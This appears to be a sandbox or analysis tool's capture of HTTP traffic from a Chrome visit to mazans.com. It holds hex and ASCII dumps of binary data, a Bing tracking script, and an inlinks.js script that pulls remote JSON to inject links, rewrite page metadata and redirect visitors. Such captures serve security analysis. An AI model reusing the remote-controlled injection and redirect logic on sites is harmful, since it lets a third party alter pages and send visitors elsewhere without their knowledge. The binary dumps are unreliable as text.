                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: b6 ae e6 1f 24 43 dd 92 73 ec 75 6f 3c 3c 93 bf 72 1b 3d bb 28 c6 75 d6 9f 74 4c 64 b6 7d 3a a1 01 67 2b 68 f4 e5 16 b8 54 98 68 58 f6 4a 39 8f cb 5c 27 36 e8 bd 55 41 1a 3b 4e d8 20 c8 93 44 96 3a 9a dd 8c e4 36 a1 5f 96 49 77 15 7d 8a b0 99 dc 3d d7 7d b8 12 71 5c 14 85 22 4c 22 23 b4 d5 e7 4e 90 2d c7 a1 81 94 0b b6 6c 70 38 2f cb 2d 36 bb de 5f 14 bd 41 43 99 36 9a 32 b2 7d 96 4a 10 96 49 d8 33 77 1f 74 19 50 3c e5 7a 60 2b 7d 94 8d d4 22 2b 8e e1 f8 be 35 5a d8 07 54 e9 0c 4a ac d7 36 c6 87 c9 e0 86 37 06 e2 16 b6 1a 68 17 66 a0 f5 16 a6 d8 e0 d7 61 6f 77 50 fe d2 31 3a 86 cd e6 f3 f8 8e c7 c8 4e ea 30 e0 14 e6 e8 29 1c 16 cf a6 73 d9 69 4b cd 30 7d d4 b9 9f 60 36 0f 70 32 b0 6f 3e 49 4f 2f 67 af 16 90 59 ab ad 3b 3c 42 f2 16 fa 66 10 b8 9d b6 68 bb
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: $Csuo<<r=(utLd}:g+hThXJ9\'6UA;N D:6_Iw}=}q\"L"#N-lp8/-6_AC62}JI3wtP<z`+}"+5ZTJ67hfaowP1:N0)siK0}`6p2o>IO/gY;<Bfh
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: eb 04 a4 26 b6 c5 64 62 66 52 c6 ee 78 a0 a6 b6 4a d8 b0 ad c3 ca 5b 30 96 b8 e1 f0 06 b5 7a ab 8f 8d 99 8a 40 2f e0 97 75 40 27 a8 9b 13 ed 46 b0 ae 9f 19 48 51 06 df 08 70 d0 10 11 4c aa 36 f5 cd 2e 1e d7 40 84 b5 00 49 08 11 6c 56 4a b8 34 a9 79 04 4e ca 0c 48 b7 4d 8b 54 0f 82 85 24 da 62 52 44 da 42 96 32 a8 12 bc 11 50 73 ed 77 90 8a dd 03 47 b4 db c2 a2 4b 91 84 03 5d 2a d6 67 4e 49 af 6e a0 4d 57 a9 28 d3 b8 0c 5d c6 d8 68 bd b9 24 d6 10 1b dd f7 e3 8a 7c 59 ff 53 78 a2 23 37 7c 2b 67 bc e7 f2 13 67 94 06 f1 d7 ee 7c 8c e1 a8 e4 a0 9a e7 3a ec ed 1c 98 35 1c 13 00 07 55 52 86 d9 7f 89 6f 64 ba 5f 4b b1 b6 81 4d 6f 57 d2 ac b9 b2 4f 76 eb ff 00 47 57 23 6a d5 e8 31 a3 c5 1f 4d 4b be ff c2 34 49 7f 4c 9c 89 ee b8 d8 22 1c db 6f 31 e6 7d ff cd d3 6d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: &dbfRxJ[0z@/u@'FHQpL6.@IlVJ4yNHMT$bRDB2PswGK]*gNInMW(]h$|YSx#7|+gg|:5URod_KMoWOvGW#j1MK4IL"o1}m
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: 00 e1 72 d9 a2 2f 24 2b f9 5c 52 52 4f c8 e5 3f 55 df de 80 6f a2 0c 78 b2 e9 f0 3d 94 0e 4f 32 dd 5b 4b 08 4c c9 c2 7f 8e 37 7a 70 4e ab 0d 5b 4a 73 62 8b 13 38 0e 42 d6 33 78 a8 5b 81 63 3a 4a 28 78 b0 7b b0 9f 23 d2 46 98 11 35 03 50 d0 b1 2c e1 6b 03 41 0d da f0 13 23 aa 36 84 0b 93 79 a8 85 b8 d8 1d 18 c8 19 3b eb 72 95 4a 92 b9 8e 92 b1 a2 d6 40 2a 6d 0f 9d 03 70 c6 9c 02 87 b9 03 5a f3 d4 54 44 2c 45 c2 d6 ad 73 0a d0 23 09 1c c3 a6 72 5d ab 47 1b 97 ef 36 56 86 9d 88 54 4f 1a ea 40 03 eb 77 4d dd 7e 64 8c a0 aa be 69 04 31 2e 44 a0 32 ad b2 a2 f4 c7 6f d6 dc 11 c1 a8 cd 9a 8f 44 64 3a 28 75 e2 83 fd 9d 8c 5c 09 f6 86 da 52 5d 45 af 8f da c2 d7 6a dc a6 9d 44 ad ef 99 1f 00 e0 e9 38 77 49 29 15 74 0f 0e 7b 6e 79 35 6a 47 de c1 48 41 ee 91 38 00 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: r/$+\RRO?Uox=O2[KL7zpN[Jsb8B3x[c:J(x{#F5P,kA#6y;rJ@*mpZTD,Es#r]G6VTO@wM~di1.D2oDd:(u\R]EjD8wI)t{ny5jGHA8g
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: 3f 38 72 95 0e b2 88 01 59 ae 94 15 dd 80 68 b5 1a 7b 31 c7 00 4e 15 98 79 aa be 42 41 2e ad b8 4b 18 e0 29 5e 1c 72 32 0d 02 c6 54 3c d7 0e 82 14 2d 24 02 89 53 07 11 20 c9 35 ff a3 31 9b fc ab dd 0f c9 b5 0e db be 73 09 17 60 61 00 0a c0 b2 41 62 2e 72 d9 aa 9d 89 d6 95 d4 ff 50 a6 53 b4 1c 2e f1 42 1d 20 cb 40 e5 e6 89 a4 0d 29 31 4b 12 e6 85 89 0f 64 f2 d5 fd dd 12 4a b8 90 2a 74 10 f4 a6 d9 d6 7d 98 4c 66 7a af 48 ea 33 96 92 3d 11 11 7d 9a da de 67 7f 11 76 43 9f fd 20 a2 bb e4 ec 99 a8 d8 99 66 cd 6d d7 c5 59 d8 0d 3c 5c 96 56 b1 41 cd 9a 58 6d 64 07 9f 35 7f a8 88 63 14 ec b2 b3 9d 47 62 a5 c6 21 db 79 ec 03 f0 9d 7c b6 03 5a c1 9d ff b6 d0 0f a0 77 fc e0 6c f2 95 c2 23 a2 db 70 37 e8 fe f5 44 ca 36 48 ee 54 d8 6b 63 56 e6 51 2d 58 8b e3 62 8a 1d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ?8rYh{1NyBA.K)^r2T<-$S 51s`aAb.rPS.B @)1KdJ*t}LfzH3=}gvC fmY<\VAXmd5cGb!y|Zwl#p7D6HTkcVQ-Xb
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1102INData Raw: 5b df 22 35 f0 65 76 da d6 21 b8 5e 4c 2e 2f 7b 98 24 bf 09 4f e9 af 2e b5 26 46 c0 65 c4 9a 69 01 88 e4 57 00 92 c8 1d e2 ad 7c c8 74 45 19 9e da b3 0a fa fd b4 8d 19 49 82 44 64 78 56 cf 00 a6 08 30 05 80 a5 b9 88 c8 08 cc 8e 15 bb f2 7e 53 6e 35 9a ab 49 ba de a2 75 ca db 29 21 5d 9e 68 d8 2e f8 59 10 ef 72 84 62 eb ce 15 77 e3 22 29 45 8e 39 e4 e4 07 a3 49 6f a6 8a a5 22 19 23 be a0 84 ba ba 89 c0 80 b9 1c c0 41 b6 72 92 49 81 10 5f 91 59 56 12 51 c2 a6 84 f5 4a 54 6f 84 2e d1 a0 3b 32 a1 b2 45 82 f5 60 2f 45 8b 24 27 64 c7 b3 86 20 5d 50 a4 50 d3 39 5a 57 e5 84 8f 36 47 50 18 70 12 58 55 23 86 d6 41 ba 19 54 0c 0d f2 7b 33 c3 d7 e0 d3 0f 74 a1 b4 d7 8f 15 b5 19 38 95 bc 58 98 d1 e4 df af 12 60 0c 86 4a 3c 80 42 78 da 01 2a a5 07 c7 4c 40 cb d0 8b 1e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ["5ev!^L./{$O.&FeiW|tEIDdxV0~Sn5Iu)!]h.Yrbw")E9Io"#ArI_YVQJTo.;2E`/E$'d ]PP9ZW6GPpXU#AT{3t8X`J<Bx*L@


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          45192.168.2.1749850104.26.5.394436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC523OUTGET /x/45414/inlinks.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: jscloud.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC872INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          last-modified: Tue, 21 May 2024 15:55:07 GMT
                                                                                                                                                                                                                                                                                                                                                                          vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                          Age: 973
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XOOQr9ba%2BPPSsnsgAPeYhqDFrDvwkQB%2FGRmVZG2abdUL9KCArybSaAlpaSdEYMWYbSVE9rgT0Wey0jOzs%2B584njVVhAarbtbsov%2BxYTMJI2vnw2J3QEIPKS%2BPzJi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8e2023b5b9c279a3-DEN
                                                                                                                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=18789&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1101&delivery_rate=153154&cwnd=32&unsent_bytes=0&cid=33c245a23531138d&ts=179&x=0"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC497INData Raw: 64 35 37 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 69 6e 64 45 6c 28 65 2c 74 29 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 6e 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 69 66 28 6e 5b 72 5d 2e 74 65 78 74 43 6f 6e 74 65 6e 74 2e 69 6e 63 6c 75 64 65 73 28 74 29 29 72 65 74 75 72 6e 20 6e 5b 72 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 0a 76 61 72 20 67 65 74 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 74 2e 6f 70 65 6e 28 22 47 45 54 22 2c 65 2c 21 30 29 2c 74 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 3d 22 6a 73 6f 6e 22 2c 74 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: d57function findEl(e,t){var n=document.querySelectorAll(e);for(var r=0;r<n.length;r++)if(n[r].textContent.includes(t))return n[r];return null}var getJSON=function(e,n){var t=new XMLHttpRequest;t.open("GET",e,!0),t.responseType="json",t.onload=function(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1369INData Raw: 68 3d 6a 73 6f 6e 50 61 74 68 2e 72 65 70 6c 61 63 65 28 22 23 62 6f 64 79 22 2c 22 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 70 22 29 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6c 69 22 29 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 7b 76 61 72 20 6f 3d 6e 5b 72 5d 2e 74 2c 69 3d 6e 5b 72 5d 2e 61 2c 73 3d 6e 5b 72 5d 2e 6e 2c 6c 6e 6b 64 3d 66 61 6c 73 65 3b 69 66 28 22 70 22 3d 3d 3d 6f 7c 7c 22 6c 69 22 3d 3d 3d 6f 29 7b 76 61 72 20 70 2c 6c 3d 6e 5b 72 5d 2e 6f 2c 6c 72 65 66 3d 6e 5b 72 5d 2e 6f 2e 72 65 70 6c 61 63 65 28 27 5c 5c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: h=jsonPath.replace("#body",""),function(e,n){if(null===e){var t=document.getElementsByTagName("p"),a=document.getElementsByTagName("li");for(var r in n){var o=n[r].t,i=n[r].a,s=n[r].n,lnkd=false;if("p"===o||"li"===o){var p,l=n[r].o,lref=n[r].o.replace('\\
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1369INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 7d 29 3b 20 20 0a 20 20 20 20 7d 0a 7d 0a 65 6c 73 65 20 69 66 20 28 22 74 74 22 20 3d 3d 3d 20 6f 29 20 7b 20 0a 20 20 20 20 76 61 72 20 6e 74 3d 6e 5b 72 5d 2e 6e 20 3b 20 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 74 69 74 6c 65 27 29 2e 74 65 78 74 43 6f 6e 74 65 6e 74 20 3d 20 6e 74 3b 0a 7d 0a 65 6c 73 65 20 69 66 20 28 22 6d 74 22 20 3d 3d 3d 20 6f 20 7c 7c 20 22 6e 66 22 20 3d 3d 3d 20 6f 29 20 7b 20 2f 2f 20 6d 65 74 61 20 64 65 73 63 0a 20 20 20 20 76 61 72 20 63 6c 3d 6e 5b 72 5d 2e 6e 20 3b 20 2f 2f 20 63 6f 72 72 65 63 74 65 64 0a 20 20 20 20 69 66 20 28 22 6d 74 22 20 3d 3d 3d 20 6f 29 20 7b 20 76 61 72 20 73 65 61 72 63 68 54 61 67 20 3d 20 27 64 65 73 63 72 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: }); }}else if ("tt" === o) { var nt=n[r].n ; document.querySelector('title').textContent = nt;}else if ("mt" === o || "nf" === o) { // meta desc var cl=n[r].n ; // corrected if ("mt" === o) { var searchTag = 'descri
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC187INData Raw: 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 41 70 70 65 6e 64 20 74 68 65 20 6e 65 77 20 6d 65 74 61 20 65 6c 65 6d 65 6e 74 20 74 6f 20 74 68 65 20 68 65 61 64 0a 20 20 20 20 20 20 20 20 68 65 61 64 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 61 29 3b 0a 7d 0a 65 6c 73 65 20 69 66 20 28 22 72 64 22 20 3d 3d 3d 20 6f 29 0a 7b 0a 20 20 20 20 63 6c 3d 6e 5b 72 5d 2e 6e 20 3b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 63 6c 29 3b 0a 7d 0a 0a 7d 7d 7d 29 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: = document.head; // Append the new meta element to the head headElement.appendChild(ca);}else if ("rd" === o){ cl=n[r].n ; window.location.replace(cl);}}}});
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          46192.168.2.1749848150.171.27.104436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC512OUTGET /bat.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private,max-age=1800
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 51385
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 16 Oct 2024 22:47:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          ETag: "028e0691d20db1:0"
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 4213A985C16A4BBAB92916015D1616B6 Ref B: DFW30EDGE1806 Ref C: 2024-11-13T16:29:14Z
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC2516INData Raw: 66 75 6e 63 74 69 6f 6e 20 55 45 54 28 6f 29 7b 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 6e 2e 6c 65 6e 67 74 68 3e 30 7d 3b 74 68 69 73 2e 64 6f 6d 61 69 6e 3d 22 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 22 3b 74 68 69 73 2e 64 6f 6d 61 69 6e 43 6c 3d 22 62 61 74 2e 62 69 6e 67 2e 6e 65 74 22 3b 74 68 69 73 2e 55 52 4c 4c 45 4e 47 54 48 4c 49 4d 49 54 3d 34 30 39 36 3b 74 68 69 73 2e 70 61 67 65 4c 6f 61 64 45 76 74 3d 22 70 61 67 65 4c 6f 61 64 22 3b 74 68 69 73 2e 63 75 73 74 6f 6d 45 76 74 3d 22 63 75 73 74 6f 6d 22 3b 74 68 69 73 2e 70 61 67 65 56 69 65 77 45 76 74 3d 22 70 61 67 65 5f 76 69 65 77 22 3b 6f 2e 56 65 72 3d 6f 2e 56 65 72 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC8192INData Raw: 22 7d 2c 66 6c 69 67 68 74 5f 65 6e 64 64 61 74 65 3a 7b 74 79 70 65 3a 22 64 61 74 65 22 7d 2c 66 6c 69 67 68 74 5f 74 6f 74 61 6c 76 61 6c 75 65 3a 7b 74 79 70 65 3a 22 6e 75 6d 62 65 72 22 7d 2c 61 66 66 69 6c 69 61 74 69 6f 6e 3a 7b 7d 2c 62 72 73 5f 72 65 73 70 6f 6e 73 65 5f 69 64 3a 7b 7d 2c 63 68 65 63 6b 6f 75 74 5f 6f 70 74 69 6f 6e 3a 7b 7d 2c 63 68 65 63 6b 6f 75 74 5f 73 74 65 70 3a 7b 74 79 70 65 3a 22 69 6e 74 65 67 65 72 22 7d 2c 63 6f 6e 74 65 6e 74 5f 69 64 3a 7b 7d 2c 63 6f 6e 74 65 6e 74 5f 74 79 70 65 3a 7b 7d 2c 63 6f 75 70 6f 6e 3a 7b 7d 2c 63 75 72 72 65 6e 63 79 3a 7b 74 79 70 65 3a 22 73 74 72 69 6e 67 5f 63 75 72 72 65 6e 63 79 22 2c 62 65 61 63 6f 6e 3a 22 67 63 22 7d 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 7b 7d 2c 66 61 74 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "},flight_enddate:{type:"date"},flight_totalvalue:{type:"number"},affiliation:{},brs_response_id:{},checkout_option:{},checkout_step:{type:"integer"},content_id:{},content_type:{},coupon:{},currency:{type:"string_currency",beacon:"gc"},description:{},fata
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC5300INData Raw: 6d 62 65 72 22 26 26 75 25 31 3d 3d 30 26 26 75 3e 3d 30 26 26 75 3c 3d 32 26 26 28 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 65 72 72 6f 72 42 65 61 63 6f 6e 4c 65 76 65 6c 3d 75 29 29 3b 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 64 69 73 61 62 6c 65 41 75 74 6f 50 61 67 65 56 69 65 77 3d 21 31 3b 6f 2e 64 69 73 61 62 6c 65 41 75 74 6f 50 61 67 65 56 69 65 77 3d 3d 3d 21 30 26 26 28 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 64 69 73 61 62 6c 65 41 75 74 6f 50 61 67 65 56 69 65 77 3d 21 30 29 3b 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 64 69 73 61 62 6c 65 56 69 73 69 62 69 6c 69 74 79 45 76 65 6e 74 73 3d 21 31 3b 6f 2e 64 69 73 61 62 6c 65 56 69 73 69 62 69 6c 69 74 79 45 76 65 6e 74 73 3d 3d 3d 21 30 26 26 28 74 68 69 73 2e 75 65 74 43 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: mber"&&u%1==0&&u>=0&&u<=2&&(this.uetConfig.errorBeaconLevel=u));this.uetConfig.disableAutoPageView=!1;o.disableAutoPageView===!0&&(this.uetConfig.disableAutoPageView=!0);this.uetConfig.disableVisibilityEvents=!1;o.disableVisibilityEvents===!0&&(this.uetCo
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC8192INData Raw: 68 3e 31 26 26 6e 5b 30 5d 21 3d 3d 74 68 69 73 2e 70 61 67 65 4c 6f 61 64 45 76 74 29 74 3d 6e 5b 30 5d 2c 69 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 6e 2c 31 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 3b 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 75 65 74 4c 6f 61 64 65 64 7c 7c 74 68 69 73 2e 65 76 71 43 44 69 73 70 61 74 63 68 26 26 74 68 69 73 2e 70 72 6f 63 65 73 73 45 61 72 6c 79 5b 74 5d 3f 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 5f 70 75 73 68 28 5b 74 2c 69 2c 72 5d 29 3a 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 65 76 65 6e 74 50 75 73 68 51 75 65 75 65 2e 70 75 73 68 28 5b 74 2c 69 2c 72 5d 29 7d 3b 74 68 69 73 2e 5f 70 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: h>1&&n[0]!==this.pageLoadEvt)t=n[0],i=Array.prototype.slice.call(n,1);else return;this.uetInstance.uetLoaded||this.evqCDispatch&&this.processEarly[t]?this.uetInstance._push([t,i,r]):this.uetInstance.eventPushQueue.push([t,i,r])};this._push=function(n){var
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC8192INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6d 65 74 61 22 29 2e 6b 65 79 77 6f 72 64 73 26 26 28 75 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6d 65 74 61 22 29 2e 6b 65 79 77 6f 72 64 73 2e 63 6f 6e 74 65 6e 74 2c 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 28 75 29 26 26 28 6e 2e 6b 77 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 43 2f 67 69 2c 22 2c 22 29 29 29 2c 74 3f 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 28 74 68 69 73 2e 70 72 65 76 69 6f 75 73 50 61 67 65 29 26 26 21 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 72 22 29 26 26 28 6e 2e 72 3d 74 68 69 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: getElementsByTagName("meta").keywords&&(u=window.document.head.getElementsByTagName("meta").keywords.content,this.stringExists(u)&&(n.kw=encodeURIComponent(u).replace(/%2C/gi,","))),t?this.stringExists(this.previousPage)&&!n.hasOwnProperty("r")&&(n.r=this
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC8192INData Raw: 26 26 28 74 2e 70 72 6f 64 69 64 3d 74 2e 65 63 6f 6d 6d 5f 70 72 6f 64 69 64 2c 64 65 6c 65 74 65 20 74 2e 65 63 6f 6d 6d 5f 70 72 6f 64 69 64 29 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 22 29 3e 30 26 26 28 74 2e 70 61 67 65 74 79 70 65 3d 74 2e 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 2c 64 65 6c 65 74 65 20 74 2e 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 29 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 70 61 67 65 74 79 70 65 22 29 26 26 28 74 2e 70 61 67 65 74 79 70 65 3d 3d 6e 75 6c 6c 7c 7c 74 2e 70 61 67 65 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 28 29 3d 3d 3d 22 22 29 26 26 64 65 6c 65 74 65 20 74 2e 70 61 67 65 74 79 70 65 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28
